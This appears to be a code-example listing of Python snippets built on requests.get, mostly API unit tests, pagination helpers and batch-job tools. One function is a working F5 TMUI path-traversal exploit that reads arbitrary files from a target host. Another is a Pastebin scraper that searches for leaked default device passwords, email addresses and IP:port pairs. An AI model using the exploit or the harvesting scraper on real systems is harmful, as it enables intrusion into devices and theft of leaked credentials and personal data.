def setUp(self):
    """Configure endpoint URLs and an authenticated session header for each test."""
    base = "http://0.0.0.0:3000/"
    self.api_url = base + "api/"
    self.run_url = base + "exec/"
    self.foundry_url = base + "foundry/"

    # Anonymous login; the returned session key authenticates later requests.
    login = GET(base + "login", params={"user": "", "password": ""})
    self.headers = {
        "Content-type": "application/json",
        "sessionkey": login.json()["sessionkey"],
    }
Example #2
    def test_foundry_api(self):
        """The foundry inventory endpoint returns a large E. coli block set."""
        response = GET(self.foundry_url + "inventory/ecoli", headers=self.headers)
        self.assertTrue(response.status_code == 200)
        payload = response.json()
        self.assertTrue(len(payload["blocks"]) > 4000)
Example #3
 def filterData(self, data: requests.get) -> int:
     """Extract item ids and image names from an API response.

     Parses the response JSON once, enqueues every image name on
     ``self.queue``, writes both lists to the logfile via
     ``self.writeLogfile``, and returns the last item's id as an int.

     NOTE(review): the ``requests.get`` annotation is a function, not a
     type -- the argument is actually a ``requests.Response``. Kept for
     interface compatibility.
     """
     # Fix: parse the payload once (the original called data.json() twice,
     # re-parsing the body for each list).
     items = data.json()["items"]
     ids = [str(item["id"]) for item in items]
     imageNames = [item["image"] for item in items]
     for image in imageNames:
         self.queue.put(image)
     self.writeLogfile(ids, imageNames)
     # Raises IndexError when "items" is empty, same as the original.
     return int(ids[-1])
Example #4
def status_checker(req: requests.get):
    """Validate an HTTP response: True for 200 OK, raise for anything else."""
    code = req.status_code
    if code == requests.status_codes.codes.ok:
        return True
    if 400 <= code <= 599:
        # 4XX/5XX: delegate to requests for a detailed HTTPError.
        req.raise_for_status()
    else:
        # Any other unexpected status (e.g. redirects) is treated as an error.
        raise HttpError(code)
  def test_foundry_api(self):
    """Fetch the E. coli inventory and check the block set is large."""
    res = GET(self.foundry_url + "inventory/ecoli", headers=self.headers)
    self.assertTrue(200 == res.status_code)
    inventory = res.json()
    self.assertTrue(len(inventory["blocks"]) > 4000)
def send_request(ip: str, filename: str) -> str:
    """Read *filename* from a remote F5 TMUI host via the path-traversal endpoint.

    Returns the file contents from the JSON ``output`` field, or ``None``
    when the response is not JSON or lacks that field (exploit failed).
    """
    # Fix: the original never used the `filename` parameter -- the URL
    # contained a mangled literal placeholder instead of the format field.
    # SECURITY NOTE: verify=False disables TLS certificate validation
    # (targets typically use self-signed certs, but this permits MITM).
    r = GET(
        f"https://{ip}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"
        f"?fileName={filename}",
        verify=False)
    try:
        output = r.json()["output"]
    except (ValueError, KeyError):
        # Non-JSON body or missing "output" key: the request did not succeed.
        return None
    return output
Example #7
    def setUp(self):
        """Build service URLs and authenticate once per test."""
        root = "http://0.0.0.0:3000/"
        self.api_url = root + "api/"
        self.run_url = root + "exec/"
        self.foundry_url = root + "foundry/"

        # Log in with empty credentials and keep the session key for
        # authenticating all subsequent requests.
        session = GET(root + "login", params={"user": "", "password": ""})
        self.headers = {
            "Content-type": "application/json",
            "sessionkey": session.json()["sessionkey"],
        }
Example #8
def collect_things(endpoint):
    """Fetch every page of a paginated API endpoint and return the combined list.

    Follows the ``next`` relation from parsed ``Link`` headers until the
    last page is reached.
    """
    parameters = {"per_page": 100}

    # Consistency fix: pass params as a keyword argument, matching the
    # loop below (the original passed it positionally on the first call).
    response = GET(endpoint, params=parameters)
    link_headers = parseLinkHeader(response.headers)
    things = response.json()

    while 'next' in link_headers:
        response = GET(link_headers['next'], params=parameters)
        link_headers = parseLinkHeader(response.headers)
        things += response.json()

    return things
  def test_cloning(self):
    """Clone a project three times and verify ancestor/descendant tracking."""
    headers = self.headers
    url = self.api_url

    # Minimal empty project payload accepted by the API.
    empty_project = {
        "metadata": {
            "authors": [],
            "version": "0.0.0",
            "tags": {}
        },
        "components": [],
        "settings": {}
    }

    # Create the root project, then a chain of three clones: pid1 -> pid4.
    res = POST(url + "project", data=json(empty_project), headers=headers)
    pid1 = res.json()['id']

    chain = [pid1]
    for _ in range(3):
        res = POST(url + "clone/" + chain[-1], headers=headers)
        chain.append(res.json()['id'])
    pid2, pid3, pid4 = chain[1], chain[2], chain[3]

    res = GET(url + "project/" + pid4, headers=headers)

    # The newest clone's ancestry should list its parents newest-first.
    hist = GET(url + "ancestors/" + pid4, headers=headers)
    self.assertTrue(hist.status_code == 200)

    hist = hist.json()
    self.assertTrue(len(hist) == 3)
    self.assertTrue(hist[0] == pid3)
    self.assertTrue(hist[1] == pid2)
    self.assertTrue(hist[2] == pid1)

    # The root project should see the entire clone chain below it.
    child = GET(url + "descendants/" + pid1, headers=headers)
    self.assertTrue(child.status_code == 200)
    child = child.json()

    self.assertTrue(len(child) == 5)
    self.assertTrue(len(child['leaves']) == 1)
Example #10
    def test_cloning(self):
        """Clone a project three times and verify ancestry bookkeeping."""
        headers = self.headers
        url = self.api_url

        # Minimal empty project payload accepted by the API.
        proj1 = {
            "metadata": {
                "authors": [],
                "version": "0.0.0",
                "tags": {}
            },
            "components": [],
            "settings": {}
        }

        # NOTE(review): `json` is called as a function here -- presumably a
        # serializer alias (e.g. json.dumps) imported elsewhere; confirm.
        res = POST(url + "project", data=json(proj1), headers=headers)
        pid1 = res.json()['id']

        # Build a clone chain: pid1 -> pid2 -> pid3 -> pid4.
        res = POST(url + "clone/" + pid1, headers=headers)
        pid2 = res.json()['id']

        res = POST(url + "clone/" + pid2, headers=headers)
        pid3 = res.json()['id']

        res = POST(url + "clone/" + pid3, headers=headers)
        pid4 = res.json()['id']

        res = GET(url + "project/" + pid4, headers=headers)

        # Ancestors of the newest clone, expected newest-first.
        hist = GET(url + "ancestors/" + pid4, headers=headers)
        self.assertTrue(hist.status_code == 200)

        hist = hist.json()
        self.assertTrue(len(hist) == 3)
        self.assertTrue(hist[0] == pid3)
        self.assertTrue(hist[1] == pid2)
        self.assertTrue(hist[2] == pid1)

        # Descendants of the root project: whole chain plus metadata keys.
        child = GET(url + "descendants/" + pid1, headers=headers)
        self.assertTrue(child.status_code == 200)
        child = child.json()

        self.assertTrue(len(child) == 5)
        self.assertTrue(len(child['leaves']) == 1)
Example #11
def __getRunningJobs(batchsite):
    """Query the workflow watchdog for jobs currently running at *batchsite*.

    Returns the server-reported job list, or [] when the server reports an
    error (the error message is logged first). Raises via
    ``raise_for_status`` on an HTTP-level failure.
    """
    log = getLogger("script")
    res = Rget("%s/watchdog/" % DAMPE_WORKFLOW_URL, data={"site": str(batchsite)})
    res.raise_for_status()
    payload = res.json()
    # Idiom fix: `!=` instead of `not ... == "ok"`.
    if payload.get("result", "nok") != "ok":
        log.error(payload.get("error"))
        return []
    return payload.get("jobs")
Example #12
from whoohoo import *
from requests import get as GET

# Translate the Bee Movie script into a Scottish dialect and save it to a file.
translator = WhooHooTranslator(WhooHooTranslatorType.scottie)
# Download the raw script text from Pastebin.
bee_movie_script = GET("https://pastebin.com/raw/UfFEq7ei").content.decode()
# Strip the blank padding lines left over from the paste formatting.
bee_movie_script = bee_movie_script.replace('\r\n  \r\n', '')
translator.translate_to_file(
    bee_movie_script, 'bee movie script but it\'s in a scottish dialect.txt')
Example #13
    ':admin', ':1234', 'xc3511', 'GMB182', 'Zte521', 'vizxv', 'oelinux123',
    'jauntech'
]
passwords = "(.*" + ".*)|(.*".join(passwords) + ".*)"

justOnce = True

Zzz = 240
while True:
    try:
        pois = []
        urls = read()
        for url in urls:
            file = 'https://pastebin.com/raw%s' % url
            print file
            text = GET(file).content

            # check for email addresses
            emails = re.findall(r'[\w\.-]+@[\w\.-]+', text)
            if len(emails) > 20:
                print 'Email addresses'
                pois.append((
                    file,
                    'email',
                    text.encode('UTF-8'),
                ))
                continue

            # check for ip addresses followed by a port
            found = re.findall(
                r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}:)',
Example #14
def main(args=None):
    """Roll back matching job instances in the workflow DB to a fresh state.

    Queries the DAMPE workflow server for job instances matching the CLI
    filters and, after user confirmation, POSTs a reset status record for
    each one.

    NOTE(review): this block is Python 2 (print statements, dict.iteritems).
    """
    usage = "Usage: %(prog)s JobName [options]"
    description = "roll-back Jobs in DB"
    parser = ArgumentParser(usage=usage, description=description)
    parser.add_argument("--title", dest="title", type=str, default=None, help='name of job, required!', required=True)
    parser.add_argument("--type", dest="type", type=str, default="Generation", help='type of job, required!',
                        required=False)
    parser.add_argument("--instance", dest="inst", type=int, default=None,
                        help='to roll back specific instance', required=False)
    parser.add_argument("--status", dest="stat", type=str, default="Failed",
                        help='jobs to be picked for roll-back, Any will return all statii!', required=False)
    parser.add_argument("--n_min", dest="n_min", type=int, default=None, help='roll back everything above this number',
                        required=False)
    parser.add_argument("--n_max", dest="n_max", type=int, default=None, help='roll back everything below this number',
                        required=False)
    parser.add_argument("--set-var", dest="set_var", type=str, default=None,
                        help="set variables for streams, format is key1=value1;key2=value2, separate by ;")
    opts = parser.parse_args(args)
    # Unbounded roll-back of every instance: ask for explicit confirmation.
    if opts.n_min is None and opts.n_max is None and opts.inst is None and opts.stat == "Any":
        q = query_yes_no("WARNING: you are requesting to roll back all instances of job %s.\
                        \nThis query may take a while to be completed, are you sure?" % opts.title)
        if not q:
            print 'rollback aborted'
            sys_exit()
    # Warn (but proceed) when the requested instance range is large.
    if not (opts.n_min is None and opts.n_max is None):
        _range = opts.n_max - opts.n_min
        if _range > 100: print 'WARNING: you are querying more than 100 jobs, this may take a while to complete'
    override_dict = {"InputFiles": [], "OutputFiles": [], "MetaData": []}
    # --set-var "k1=v1;k2=v2" becomes MetaData override entries.
    if opts.set_var is not None:
        var_dict = dict({tuple(val.split("=")) for val in opts.set_var.split(";")})
        override_dict['MetaData'] = [{"name": k, "value": v, "var_type": "string"} for k, v in var_dict.iteritems()]
    # Build the query payload from all non-None CLI options (set_var excluded).
    my_dict = {}
    for key in opts.__dict__:
        if opts.__dict__[key] is not None:
            my_dict[key] = opts.__dict__[key]
    if 'set_var' in my_dict: del my_dict['set_var']
    # get all jobs to roll back.
    res = Rget("%s/jobstatus/" % DAMPE_WORKFLOW_URL, data=my_dict)
    res.raise_for_status()
    res = res.json()
    # NOTE(review): on a server-reported error this only prints, then still
    # dereferences res.get("jobs") below -- confirm falling through is intended.
    if res.get("result", "nok") != "ok":
        print "error %s" % res.get("error")
    jobs = res.get("jobs")
    if len(jobs):
        print 'found %i jobs that satisfy query conditions.' % len(jobs)
        if query_yes_no("continue rolling back %i instances?" % len(jobs)):
            for j in jobs:
                # Reset each instance to a pristine pre-submission state.
                my_dict = {"t_id": j['jobId'], "inst_id": j['instanceId'],
                           "major_status": "New", "minor_status": "AwaitingBatchSubmission", "hostname": None,
                           "batchId": None, "status_history": [], "body": str(override_dict),
                           "log": "", "cpu": [], "memory": [], "created_at": "Now"}
                res = post("%s/jobstatus/" % DAMPE_WORKFLOW_URL, data={"args": dumps(my_dict)})
                res.raise_for_status()
                res = res.json()
                if not res.get("result", "nok") == "ok":
                    print ("error resetting instance %s" % res.get("error"))
            print 'rolled back %i instances' % len(jobs)
        else:
            print 'rollback aborted'
            sys_exit()
    else:
        print 'could not find any jobs satisfying the query.'
        sys_exit()